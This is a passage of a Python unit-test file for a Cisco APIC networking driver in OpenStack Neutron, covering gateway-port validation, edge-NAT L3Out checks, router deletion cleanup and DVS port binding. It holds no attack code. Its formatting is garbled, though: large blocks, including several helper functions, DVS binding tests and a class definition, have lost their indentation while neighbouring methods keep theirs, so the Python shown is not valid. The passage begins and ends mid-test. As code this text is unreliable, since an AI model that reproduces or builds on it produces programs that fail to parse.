        self.external_network_dict[mocked.APIC_NETWORK_NO_NAT + '-name'][
            'preexisting'] = 'True'
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK_NO_NAT,
                                            TEST_SEGMENT1, external=True)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK_NO_NAT,
                                          'vm1', net_ctx, HOST_ID1, gw=True)
        mgr = self.driver.apic_manager
        mgr.get_router_contract.return_value = mocked.FakeDbContract(
            mocked.APIC_CONTRACT)
        # The L3Out lives in 'bar_tenant', not the expected tenant.
        self.driver._query_l3out_info = mock.Mock()
        self.driver._query_l3out_info.return_value = {
            'l3out_tenant': 'bar_tenant',
            'vrf_name': 'bar_ctx',
            'vrf_tenant': 'bar_tenant'}
        if self.driver.per_tenant_context or self.driver.single_tenant_mode:
            self.assertRaises(md.PreExistingL3OutInIncorrectTenant,
                              self.driver.update_port_precommit,
                              port_ctx)
        else:
            self.driver.update_port_precommit(port_ctx)
    def test_pre_gw_port_precommit_l3out_not_exist(self):
        """A missing pre-existing L3Out raises PreExistingL3OutNotFound."""
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK_PRE,
                                            TEST_SEGMENT1, external=True)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK_PRE,
                                          'vm1', net_ctx, HOST_ID1, gw=True)
        mgr = self.driver.apic_manager
        mgr.get_router_contract.return_value = mocked.FakeDbContract(
            mocked.APIC_CONTRACT)
        # Lookup returning None means the L3Out does not exist on APIC.
        self.driver._query_l3out_info = mock.Mock()
        self.driver._query_l3out_info.return_value = None
        self.assertRaises(md.PreExistingL3OutNotFound,
                          self.driver.update_port_precommit,
                          port_ctx)
    def test_gw_port_precommit_l3out_edge_nat_invalid_vlan_range(self):
        """Edge-NAT gateway ports fail on a bad or missing VLAN range."""
        # Empty allocation pool -> EdgeNatBadVlanRange.
        self.driver.l3out_vlan_alloc.l3out_vlan_ranges = {}
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK_EDGE_NAT,
                                            TEST_SEGMENT1, external=True)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK_EDGE_NAT,
                                          'vm1', net_ctx, HOST_ID1, gw=True)
        mgr = self.driver.apic_manager
        mgr.get_router_contract.return_value = mocked.FakeDbContract(
            mocked.APIC_CONTRACT)
        self.assertRaises(md.EdgeNatBadVlanRange,
                          self.driver.update_port_precommit,
                          port_ctx)
        # No configured range at all -> EdgeNatVlanRangeNotFound.
        del (self.external_network_dict[mocked.APIC_NETWORK_EDGE_NAT + '-name']
             ['vlan_range'])
        self.assertRaises(md.EdgeNatVlanRangeNotFound,
                          self.driver.update_port_precommit,
                          port_ctx)
    def test_pre_gw_port_precommit_l3out_edge_nat_wrong_IF_type(self):
        """Edge-NAT rejects a pre-existing L3Out using an 'l3-port' interface."""
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK_PRE_EDGE_NAT,
                                            TEST_SEGMENT1, external=True)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK_PRE_EDGE_NAT,
                                          'vm1', net_ctx, HOST_ID1, gw=True)
        mgr = self.driver.apic_manager
        mgr.get_router_contract.return_value = mocked.FakeDbContract(
            mocked.APIC_CONTRACT)
        # L3Out subtree with an interface of type 'l3-port' (unsupported
        # for edge NAT, which needs sub-interfaces/SVIs).
        self.driver._query_l3out_info = mock.Mock()
        self.driver._query_l3out_info.return_value = {
            'l3out_tenant': 'bar_tenant',
            'vrf_name': 'bar_ctx',
            'vrf_tenant': 'bar_tenant',
            'l3out': [{u'l3extLNodeP':
                       {u'attributes':
                        {u'dn':
                         u'uni/tn-common/out-supported/lnodep-Leaf3-4_NP'},
                        u'children': [{u'l3extLIfP':
                                       {u'children': [{u'l3extRsPathL3OutAtt':
                                                       {u'attributes':
                                                        {u'ifInstT': u'l3-port'
                                                         }}}]}}]}}]}
        self.assertRaises(md.EdgeNatWrongL3OutIFType,
                          self.driver.update_port_precommit,
                          port_ctx)
    def test_pre_gw_port_precommit_l3out_edge_nat_wrong_OSPF_auth(self):
        """Edge-NAT rejects a pre-existing L3Out whose OSPF uses authentication."""
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK_PRE_EDGE_NAT,
                                            TEST_SEGMENT1, external=True)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK_PRE_EDGE_NAT,
                                          'vm1', net_ctx, HOST_ID1, gw=True)
        mgr = self.driver.apic_manager
        mgr.get_router_contract.return_value = mocked.FakeDbContract(
            mocked.APIC_CONTRACT)
        # OSPF interface profile with authType 'simple' (anything but
        # 'none' is rejected for edge NAT).
        self.driver._query_l3out_info = mock.Mock()
        self.driver._query_l3out_info.return_value = {
            'l3out_tenant': 'bar_tenant',
            'vrf_name': 'bar_ctx',
            'vrf_tenant': 'bar_tenant',
            'l3out': [{u'l3extLNodeP':
                       {u'attributes':
                        {u'dn':
                         u'uni/tn-common/out-supported/lnodep-Leaf3-4_NP'},
                        u'children': [{u'l3extLIfP':
                                       {u'children': [{u'ospfIfP':
                                                       {u'attributes':
                                                        {u'authType': u'simple'
                                                         }}}]}}]}}]}
        self.assertRaises(md.EdgeNatWrongL3OutAuthTypeForOSPF,
                          self.driver.update_port_precommit,
                          port_ctx)
    def test_pre_gw_port_precommit_l3out_edge_nat_wrong_BGP_auth(self):
        """Edge-NAT rejects a pre-existing L3Out whose BFD/BGP profile uses
        authentication; type 'none' on bfdIfP is accepted.
        """
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK_PRE_EDGE_NAT,
                                            TEST_SEGMENT1, external=True)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK_PRE_EDGE_NAT,
                                          'vm1', net_ctx, HOST_ID1, gw=True)
        mgr = self.driver.apic_manager
        mgr.get_router_contract.return_value = mocked.FakeDbContract(
            mocked.APIC_CONTRACT)
        # bfdIfP with type 'sha1' -> rejected.
        self.driver._query_l3out_info = mock.Mock()
        self.driver._query_l3out_info.return_value = {
            'l3out_tenant': 'bar_tenant',
            'vrf_name': 'bar_ctx',
            'vrf_tenant': 'bar_tenant',
            'l3out': [{u'l3extLNodeP':
                       {u'attributes':
                        {u'dn':
                         u'uni/tn-common/out-supported/lnodep-Leaf3-4_NP'},
                        u'children': [{u'l3extLIfP':
                                       {u'children': [{u'l3extRsNodeL3OutAtt':
                                                       {u'attributes':
                                                        {u'type': u'sha1'}}},
                                                      {u'bfdIfP':
                                                       {u'attributes':
                                                        {u'type': u'sha1'}}},
                                                      {u'l3extRsNodeL3OutAtt':
                                                       {u'attributes':
                                                        {u'type': u'sha1'}}}]}}
                                      ]}}]}
        self.assertRaises(md.EdgeNatWrongL3OutAuthTypeForBGP,
                          self.driver.update_port_precommit,
                          port_ctx)
        # try again with a good input
        self.driver._query_l3out_info.return_value['l3out'] = (
            [{u'l3extLNodeP':
              {u'attributes':
               {u'dn': u'uni/tn-common/out-supported/lnodep-Leaf3-4_NP'},
               u'children': [{u'l3extLIfP':
                              {u'children': [{u'l3extRsNodeL3OutAtt':
                                              {u'attributes':
                                               {u'type': u'sha1'}}},
                                             {u'bfdIfP':
                                              {u'attributes':
                                               {u'type': u'none'}}},
                                             {u'l3extRsNodeL3OutAtt':
                                              {u'attributes':
                                               {u'type': u'sha1'}}}]}}]}}])
        self.driver.update_port_precommit(port_ctx)
def _setup_multiple_routers(self, ext_net_name, net_ctx):
routers = [{'id': 'r1', 'tenant_id': 't1'},
{'id': 'r2', 'tenant_id': 't1'},
{'id': 'r3', 'tenant_id': 't2'}]
def get_router(ctx, id):
for r in routers:
if r['id'] == id:
return r
def get_routers(ctx, filters):
tenants = filters.get('tenant_id', [])
return [r for r in routers
if (not tenants or r['tenant_id'] in tenants)]
self.driver._l3_plugin.get_router = get_router
self.driver._l3_plugin.get_routers = get_routers
gw_ports = [
self._get_port_context(mocked.APIC_TENANT,
ext_net_name,
'gw', net_ctx, HOST_ID1, gw=True,
router_owner=r['id'])
for r in routers]
def get_ports(ctx, filters):
devices = filters.get('device_id', [])
return [p.current for p in gw_ports
if (not devices or p.current['device_id'] in devices)]
for i in xrange(len(gw_ports)):
gw_ports[i].current['id'] += i
gw_ports[i]._plugin.get_ports = get_ports
if self.driver.vrf_per_router_tenants:
self.driver.vrf_per_router_tenants.extend(['t1', 't2'])
return gw_ports
    def _test_delete_gw_port_multiple_postcommit(self, pre):
        """Delete three routers' gateway ports and verify shadow-L3Out cleanup.

        With vrf-per-router the shadow L3Out is deleted per router; with
        per-tenant context it is deleted when the last router of a tenant
        goes away. Contract unsets are checked after each deletion. *pre*
        exercises the pre-existing-L3Out naming.
        """
        if pre:
            ext_net_name = mocked.APIC_NETWORK_PRE
            ext_epg = self._scoped_name(mocked.APIC_EXT_EPG,
                                        preexisting=True)
        else:
            ext_net_name = mocked.APIC_NETWORK
            ext_epg = mocked.APIC_EXT_EPG
        shadow_ext_epg = "Shd-%s" % ext_epg
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            ext_net_name,
                                            TEST_SEGMENT1, external=True)
        gw_ports = self._setup_multiple_routers(ext_net_name, net_ctx)
        self.driver._delete_path_if_last = mock.Mock()
        mgr = self.driver.apic_manager
        # Delete first GW port
        self.driver.delete_port_postcommit(gw_ports[0])
        vrf_pfx = ('%s-' % gw_ports[0]._port['device_id']
                   if self.driver.vrf_per_router_tenants else '')
        if self.driver.single_tenant_mode and self.driver.per_tenant_context:
            shadow_l3out = (
                "Shd-%s" % self._scoped_name(vrf_pfx + ext_net_name,
                                             tenant='t1'))
        else:
            shadow_l3out = "Shd-%s" % (vrf_pfx + ext_net_name)
        if self.driver.vrf_per_router_tenants:
            # r1's dedicated shadow L3Out goes away with its port.
            mgr.delete_external_routed_network.assert_called_once_with(
                shadow_l3out, owner=self._tenant(ext_nat=True,
                                                 neutron_tenant='t1'))
        else:
            self.assertFalse(mgr.delete_external_routed_network.called)
        exp_calls = [
            mock.call(shadow_l3out,
                      'contract-r1',
                      external_epg=shadow_ext_epg,
                      owner=self._tenant(ext_nat=True,
                                         neutron_tenant='t1'),
                      provided=True),
            mock.call(shadow_l3out,
                      'contract-r1',
                      external_epg=shadow_ext_epg,
                      owner=self._tenant(ext_nat=True,
                                         neutron_tenant='t1'),
                      provided=False)
        ]
        self._check_call_list(
            exp_calls, mgr.unset_contract_for_external_epg.call_args_list)
        del gw_ports[0]
        # Delete second GW port
        mgr.delete_external_routed_network.reset_mock()
        mgr.unset_contract_for_external_epg.reset_mock()
        self.driver.delete_port_postcommit(gw_ports[0])
        vrf_pfx = ('%s-' % gw_ports[0]._port['device_id']
                   if self.driver.vrf_per_router_tenants else '')
        if self.driver.per_tenant_context:
            if self.driver.single_tenant_mode:
                shadow_l3out = (
                    "Shd-%s" % self._scoped_name(vrf_pfx + ext_net_name,
                                                 tenant='t1'))
            else:
                shadow_l3out = "Shd-%s" % (vrf_pfx + ext_net_name)
            # r2 was the last 't1' router, so its shadow L3Out is removed.
            mgr.delete_external_routed_network.assert_called_once_with(
                shadow_l3out,
                owner=self._tenant(ext_nat=True, neutron_tenant='t1'))
        else:
            self.assertFalse(mgr.delete_external_routed_network.called)
        exp_calls = [
            mock.call(shadow_l3out,
                      'contract-r2',
                      external_epg=shadow_ext_epg,
                      owner=self._tenant(ext_nat=True), provided=True),
            mock.call(shadow_l3out,
                      'contract-r2',
                      external_epg=shadow_ext_epg,
                      owner=self._tenant(ext_nat=True), provided=False)
        ]
        self._check_call_list(
            exp_calls, mgr.unset_contract_for_external_epg.call_args_list)
        del gw_ports[0]
        # Delete third GW port
        mgr.unset_contract_for_external_epg.reset_mock()
        mgr.delete_external_routed_network.reset_mock()
        mgr.get_router_contract.return_value = mocked.FakeDbContract(
            mocked.APIC_CONTRACT + 'r3')
        self.driver.delete_port_postcommit(gw_ports[0])
        vrf_pfx = ('%s-' % gw_ports[0]._port['device_id']
                   if self.driver.vrf_per_router_tenants else '')
        if self.driver.single_tenant_mode and self.driver.per_tenant_context:
            shadow_l3out = (
                "Shd-%s" % self._scoped_name(vrf_pfx + ext_net_name,
                                             tenant='t2'))
        else:
            shadow_l3out = "Shd-%s" % (vrf_pfx + ext_net_name)
        mgr.delete_external_routed_network.assert_called_once_with(
            shadow_l3out, owner=self._tenant(ext_nat=True,
                                             neutron_tenant='t2'))
    def test_delete_gw_port_multiple_postcommit(self):
        """Multi-router gw port deletion, driver-created L3Out variant."""
        self._test_delete_gw_port_multiple_postcommit(pre=False)
    def test_delete_pre_gw_port_multiple_postcommit(self):
        """Multi-router gw port deletion, pre-existing L3Out variant."""
        self._test_delete_gw_port_multiple_postcommit(pre=True)
    def _test_delete_no_nat_gw_port_multiple_postcommit(self, pre):
        """Deleting gw ports on a no-NAT network detaches the VRF only when
        the last router of a VRF is removed.

        With per-tenant context, removing r2 (last of 't1') resets the
        L3Out's context; removing r3 (last overall) always does.
        """
        ext_net_name = mocked.APIC_NETWORK_NO_NAT
        if pre:
            self.external_network_dict[mocked.APIC_NETWORK_NO_NAT + '-name'][
                'preexisting'] = 'True'
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            ext_net_name,
                                            TEST_SEGMENT1, external=True)
        gw_ports = self._setup_multiple_routers(ext_net_name, net_ctx)
        mgr = self.driver.apic_manager
        l3out = net_ctx.current['name'] if pre else ext_net_name
        if pre:
            self.driver._query_l3out_info = mock.Mock()
            self.driver._query_l3out_info.return_value = {
                'l3out_tenant': self._tenant()}
        # Delete first GW port
        self.driver.delete_port_postcommit(gw_ports[0])
        # r2 (same tenant) still uses the VRF: no context change yet.
        self.assertFalse(mgr.set_context_for_external_routed_network.called)
        del gw_ports[0]
        # delete second GW port
        self.driver.delete_port_postcommit(gw_ports[0])
        if self.driver.single_tenant_mode:
            l3out = self._scoped_name(
                net_ctx.current['name'] if pre else ext_net_name,
                preexisting=pre)
        if self.driver.per_tenant_context:
            mgr.set_context_for_external_routed_network.assert_called_with(
                self._tenant(), l3out, None, transaction=mock.ANY)
        else:
            self.assertFalse(
                mgr.set_context_for_external_routed_network.called)
        del gw_ports[0]
        # delete third GW port
        mgr.set_context_for_external_routed_network.reset_mock()
        self.driver.delete_port_postcommit(gw_ports[0])
        mgr.set_context_for_external_routed_network.assert_called_with(
            self._tenant(), l3out, None, transaction=mock.ANY)
    def test_delete_no_nat_gw_port_multiple_postcommit(self):
        """No-NAT multi-router gw port deletion, driver-created L3Out."""
        self._test_delete_no_nat_gw_port_multiple_postcommit(False)
    def test_delete_no_nat_pre_gw_port_multiple_postcommit(self):
        """No-NAT multi-router gw port deletion, pre-existing L3Out."""
        self._test_delete_no_nat_gw_port_multiple_postcommit(True)
def test_no_nat_compute_port_precommit_exception(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_NO_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_NO_NAT,
'vm1', net_ctx, HOST_ID1)
self.assertRaises(md.VMsDisallowedOnExtNetworkIfNatDisabled,
self.driver.create_port_precommit,
port_ctx)
def test_edge_nat_compute_port_precommit_exception(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_EDGE_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_EDGE_NAT,
'vm1', net_ctx, HOST_ID1)
self.assertRaises(md.VMsDisallowedOnExtNetworkIfEdgeNat,
self.driver.create_port_precommit,
port_ctx)
def _get_network_context(self, tenant_id, net_id, seg_id=None,
seg_type='vlan', external=False, shared=False,
route_leak=False):
network = {'id': net_id,
'name': net_id + '-name',
'tenant_id': tenant_id,
'provider:segmentation_id': seg_id,
'provider:network_type': seg_type,
'shared': shared}
if external:
network['router:external'] = True
if seg_id:
network_segments = [{'id': seg_id,
'segmentation_id': ENCAP,
'network_type': seg_type,
'physical_network': 'physnet1'}]
else:
network_segments = []
if route_leak:
network[ALLOW_ROUTE_LEAK] = True
return FakeNetworkContext(network, network_segments)
def _get_subnet_context(self, gateway_ip, cidr, network):
subnet = {'tenant_id': network.current['tenant_id'],
'network_id': network.current['id'],
'id': '[%s/%s]' % (gateway_ip, cidr),
'gateway_ip': gateway_ip,
'cidr': cidr}
return FakeSubnetContext(subnet, network)
def _get_port_context(self, tenant_id, net_id, vm_id, network_ctx, host,
gw=False, device_owner='compute:nova',
router_owner=None, interface=False):
port = {'device_id': vm_id,
'device_owner': device_owner,
'binding:host_id': host,
'binding:vif_type': 'unbound' if not host else 'ovs',
'tenant_id': tenant_id,
'id': mocked.APIC_PORT,
'name': mocked.APIC_PORT,
'network_id': net_id,
'fixed_ips': [{'subnet_id': 'some_id',
'ip_address': '3.3.3.1'}]}
if gw:
port['device_owner'] = n_constants.DEVICE_OWNER_ROUTER_GW
port['device_id'] = router_owner or mocked.APIC_ROUTER
if interface:
port['device_owner'] = n_constants.DEVICE_OWNER_ROUTER_INTF
port['device_id'] = router_owner or mocked.APIC_ROUTER
return FakePortContext(port, network_ctx)
    def test_keystone_notification_endpoint(self):
        """A keystone project-update notification refreshes the name alias.

        In single-tenant mode the alias is set on the app profile; otherwise
        on the tenant object itself.
        """
        self.driver.name_mapper.aci_mapper.is_tenant_in_apic = mock.Mock(
            return_value=True)
        payload = {}
        payload['resource_info'] = mocked.APIC_TENANT
        keystone_ep = md.KeystoneNotificationEndpoint(self.driver)
        keystone_ep.info(None, None, None, payload, None)
        mgr = self.driver.apic_manager
        if self.driver.single_tenant_mode:
            mgr.update_name_alias.assert_called_once_with(
                mgr.apic.fvAp, self._tenant(), self._app_profile(),
                nameAlias='new_name')
        else:
            mgr.update_name_alias.assert_called_once_with(
                mgr.apic.fvTenant, self._tenant(), nameAlias='new_name')
class ApicML2IntegratedTestCaseDvs(ApicML2IntegratedTestBase):
def setUp(self, service_plugins=None):
ml2_opts = {
'mechanism_drivers': ['openvswitch', 'cisco_apic_ml2'],
'tenant_network_types': ['opflex'],
'type_drivers': ['opflex'],
}
self.override_conf('single_tenant_mode', True,
'ml2_cisco_apic')
super(ApicML2IntegratedTestCaseDvs, self).setUp(
service_plugins, ml2_opts=ml2_opts)
# This is required for the test. Without it,
# the ML2 driver's agent_type ends up being a
# mocked type, which fails when passed to the
# hast_agents() method for the PortContext
# (but only for types not defined by the
# mechanism driver class itself).
self.driver.agent_type = ofcst.AGENT_TYPE_OPFLEX_OVS
self.driver._dvs_notifier = mock.MagicMock()
self.driver.dvs_notifier.bind_port_call = mock.Mock(
return_value={'key': BOOKED_PORT_VALUE})
def _verify_dvs_notifier(self, notifier, port, host):
# can't use getattr() with mock, so use eval instead
try:
dvs_mock = eval('self.driver.dvs_notifier.' + notifier)
except Exception:
self.assertTrue(False,
"The method " + notifier + " was not called")
return
self.assertTrue(dvs_mock.called)
a1, a2, a3, a4 = dvs_mock.call_args[0]
self.assertEqual(a1['id'], port['id'])
self.assertEqual(a2['id'], port['id'])
self.assertEqual(a4, host)
def _get_expected_pg(self, net):
if self.driver.single_tenant_mode:
return (self.driver.single_tenant_name + '|' +
net['tenant_id'] + '|' + net['id'])
else:
return (net['tenant_id'] + '|' +
mocked.APIC_SYSTEM_ID + '|' + net['id'])
def test_bind_port_dvs(self):
# Register a DVS agent
self._register_agent('h1', agent_cfg=AGENT_CONF_DVS)
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=False,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
with self.port(subnet=sub, tenant_id='onetenant') as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
self.mgr.ensure_path_created_for_port = mock.Mock()
# Bind port to trigger path binding
newp1 = self._bind_port_to_host(p1['id'], 'h1')
# Called on the network's tenant
expected_pg = self._get_expected_pg(net)
pg = newp1['port']['binding:vif_details']['dvs_port_group_name']
self.assertEqual(pg, expected_pg)
port_key = newp1['port']['binding:vif_details'].get('dvs_port_key')
self.assertIsNotNone(port_key)
self.assertEqual(port_key, BOOKED_PORT_VALUE)
self._verify_dvs_notifier('update_postcommit_port_call', p1, 'h1')
net_ctx = FakeNetworkContext(net, [{'network_type': 'opflex'}])
port_ctx = FakePortContext(newp1['port'], net_ctx)
self.driver.delete_port_postcommit(port_ctx)
self._verify_dvs_notifier('delete_port_call', p1, 'h1')
def test_bind_port_dvs_with_opflex_diff_hosts(self):
# Register an OpFlex agent and DVS agent
self._register_agent('h1')
self._register_agent('h2', agent_cfg=AGENT_CONF_DVS)
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=False,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
# Bind a VLAN port after registering a DVS agent
with self.port(subnet=sub, tenant_id='onetenant') as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
self.mgr.ensure_path_created_for_port = mock.Mock()
# Bind port to trigger path binding
newp1 = self._bind_port_to_host(p1['id'], 'h2')
# Called on the network's tenant
expected_pg = self._get_expected_pg(net)
vif_det = newp1['port']['binding:vif_details']
self.assertIsNotNone(vif_det.get('dvs_port_group_name', None))
self.assertEqual(expected_pg, vif_det.get('dvs_port_group_name'))
port_key = newp1['port']['binding:vif_details'].get('dvs_port_key')
self.assertIsNotNone(port_key)
self.assertEqual(port_key, BOOKED_PORT_VALUE)
self._verify_dvs_notifier('update_postcommit_port_call', p1, 'h2')
net_ctx = FakeNetworkContext(net, [{'network_type': 'opflex'}])
port_ctx = FakePortContext(newp1['port'], net_ctx)
self.driver.delete_port_postcommit(port_ctx)
self._verify_dvs_notifier('delete_port_call', p1, 'h2')
def test_bind_ports_opflex_same_host(self):
# Register an OpFlex agent and DVS agent
self._register_agent('h1')
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=False,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
# Bind a VLAN port after registering a DVS agent
with self.port(subnet=sub, tenant_id='onetenant') as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
self.mgr.ensure_path_created_for_port = mock.Mock()
# Bind port to trigger path binding
newp1 = self._bind_port_to_host(p1['id'], 'h1')
# Called on the network's tenant
vif_det = newp1['port']['binding:vif_details']
self.assertIsNone(vif_det.get('dvs_port_group_name', None))
port_key = newp1['port']['binding:vif_details'].get('dvs_port_key')
self.assertIsNone(port_key)
dvs_mock = self.driver.dvs_notifier.update_postcommit_port_call
dvs_mock.assert_not_called()
net_ctx = FakeNetworkContext(net, [{'network_type': 'opflex'}])
port_ctx = FakePortContext(newp1['port'], net_ctx)
self.driver.delete_port_postcommit(port_ctx)
dvs_mock = self.driver.dvs_notifier.delete_port_call
dvs_mock.assert_not_called()
self.driver.dvs_notifier.reset_mock()
with self.port(subnet=sub, tenant_id='onetenant') as p2:
p2 = p2['port']
self.assertEqual(net['id'], p2['network_id'])
self.mgr.ensure_path_created_for_port = mock.Mock()
# Bind port to trigger path binding
newp2 = self._bind_dhcp_port_to_host(p2['id'], 'h1')
# Called on the network's tenant
vif_det = newp2['port']['binding:vif_details']
self.assertIsNone(vif_det.get('dvs_port_group_name', None))
port_key = newp2['port']['binding:vif_details'].get('dvs_port_key')
self.assertIsNone(port_key)
dvs_mock.assert_not_called()
net_ctx = FakeNetworkContext(net, [{'network_type': 'opflex'}])
port_ctx = FakePortContext(newp2['port'], net_ctx)
self.driver.delete_port_postcommit(port_ctx)
dvs_mock = self.driver.dvs_notifier.delete_port_call
dvs_mock.assert_not_called()
def test_bind_ports_dvs_with_opflex_same_host(self):
# Register an OpFlex agent and DVS agent
self._register_agent('h1', agent_cfg=AGENT_CONF_DVS)
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=False,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
# Bind a VLAN port after registering a DVS agent
with self.port(subnet=sub, tenant_id='onetenant') as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
self.mgr.ensure_path_created_for_port = mock.Mock()
# Bind port to trigger path binding
newp1 = self._bind_port_to_host(p1['id'], 'h1')
# Called on the network's tenant
expected_pg = self._get_expected_pg(net)
vif_det = newp1['port']['binding:vif_details']
self.assertIsNotNone(vif_det.get('dvs_port_group_name', None))
self.assertEqual(expected_pg, vif_det.get('dvs_port_group_name'))
port_key = newp1['port']['binding:vif_details'].get('dvs_port_key')
self.assertIsNotNone(port_key)
self.assertEqual(port_key, BOOKED_PORT_VALUE)
self._verify_dvs_notifier('update_postcommit_port_call', p1, 'h1')
net_ctx = FakeNetworkContext(net, [{'network_type': 'opflex'}])
port_ctx = FakePortContext(newp1['port'], net_ctx)
self.driver.delete_port_postcommit(port_ctx)
self._verify_dvs_notifier('delete_port_call', p1, 'h1')
self.driver.dvs_notifier.reset_mock()
with self.port(subnet=sub, tenant_id='onetenant') as p2:
p2 = p2['port']
self.assertEqual(net['id'], p2['network_id'])
self.mgr.ensure_path_created_for_port = mock.Mock()
# Bind port to trigger path binding
newp2 = self._bind_dhcp_port_to_host(p2['id'], 'h1')
# Called on the network's tenant
vif_det = newp2['port']['binding:vif_details']
self.assertIsNone(vif_det.get('dvs_port_group_name', None))
port_key = newp2['port']['binding:vif_details'].get('dvs_port_key')
self.assertIsNone(port_key)
dvs_mock = self.driver.dvs_notifier.update_postcommit_port_call
dvs_mock.assert_not_called()
net_ctx = FakeNetworkContext(net, [{'network_type': 'opflex'}])
port_ctx = FakePortContext(newp2['port'], net_ctx)
self.driver.delete_port_postcommit(port_ctx)
dvs_mock = self.driver.dvs_notifier.delete_port_call
dvs_mock.assert_not_called()
    def test_bind_port_dvs_shared(self):
        """Bind a port on a shared network to a host served by a DVS agent.

        Verifies that the bound port's vif_details carry the expected DVS
        port-group name and the booked port key, and that the DVS notifier
        is invoked both on bind (update_postcommit) and on delete.
        """
        # Register a DVS agent
        self._register_agent('h1', agent_cfg=AGENT_CONF_DVS)
        net = self.create_network(
            tenant_id='onetenant', expected_res_status=201, shared=True,
            is_admin_context=True)['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4, is_admin_context=True)
        with self.port(subnet=sub, tenant_id='onetenant') as p1:
            p1 = p1['port']
            self.assertEqual(net['id'], p1['network_id'])
            self.mgr.ensure_path_created_for_port = mock.Mock()
            # Bind port to trigger path binding
            newp1 = self._bind_port_to_host(p1['id'], 'h1')
            # Called on the network's tenant
            expected_pg = self._get_expected_pg(net)
            pg = newp1['port']['binding:vif_details']['dvs_port_group_name']
            self.assertEqual(pg, expected_pg)
            port_key = newp1['port']['binding:vif_details'].get('dvs_port_key')
            self.assertIsNotNone(port_key)
            self.assertEqual(port_key, BOOKED_PORT_VALUE)
            self._verify_dvs_notifier('update_postcommit_port_call', p1, 'h1')
            net_ctx = FakeNetworkContext(net, [{'network_type': 'opflex'}])
            port_ctx = FakePortContext(newp1['port'], net_ctx)
            self.driver.delete_port_postcommit(port_ctx)
            self._verify_dvs_notifier('delete_port_call', p1, 'h1')
class ApicML2IntegratedTestCaseDvsSingleTenantMode(
        ApicML2IntegratedTestCaseDvs):
    """Re-run the DVS integration tests with single_tenant_mode enabled."""

    def setUp(self, service_plugins=None):
        # The option must be in place before the parent builds the driver.
        # NOTE(review): service_plugins is accepted for signature
        # compatibility but is not forwarded to the parent setUp here.
        self.override_conf(
            'single_tenant_mode', True, 'ml2_cisco_apic')
        super(ApicML2IntegratedTestCaseDvsSingleTenantMode, self).setUp()
class ApicML2IntegratedTestCaseDvsSingleTenantModeWithName(
        ApicML2IntegratedTestCaseDvs):
    """DVS tests with single_tenant_mode plus an explicit tenant name."""

    def setUp(self, service_plugins=None):
        # Both options must be in place before the parent builds the driver.
        self.override_conf(
            'single_tenant_mode', True, 'ml2_cisco_apic')
        self.override_conf(
            'single_tenant_name', "singleTenantName", 'ml2_cisco_apic')
        super(ApicML2IntegratedTestCaseDvsSingleTenantModeWithName,
              self).setUp()
class ApicML2IntegratedTestCaseSingleVRF(ApicML2IntegratedTestCase):
    """Integration tests run with per-tenant routing context enabled."""

    def setUp(self, service_plugins=None):
        super(ApicML2IntegratedTestCaseSingleVRF, self).setUp(service_plugins)
        self.driver.per_tenant_context = True

    def test_add_router_interface_on_shared_net_by_subnet(self):
        # Inherited test is not applicable in this mode; overridden to skip.
        pass

    def test_add_router_interface_on_shared_net_by_port(self):
        # Inherited test is not applicable in this mode; overridden to skip.
        pass

    def test_inter_tenant_router_interface_disallowed(self):
        """Attaching another tenant's subnet or port to a router must raise
        InterTenantRouterInterfaceNotAllowedOnPerTenantContext."""
        net = self.create_network(
            tenant_id='onetenant', expected_res_status=201, shared=True,
            is_admin_context=True)['network']
        # Subnet belongs to a different tenant than the router below.
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4, is_admin_context=True,
            tenant_id='anothertenant')
        router = self.create_router(api=self.ext_api,
                                    expected_res_status=201)['router']
        self.l3_plugin.per_tenant_context = True
        # Per subnet
        self.assertRaises(
            driver.InterTenantRouterInterfaceNotAllowedOnPerTenantContext,
            self.l3_plugin.add_router_interface, context.get_admin_context(),
            router['id'], {'subnet_id': sub['subnet']['id']})
        # Per port
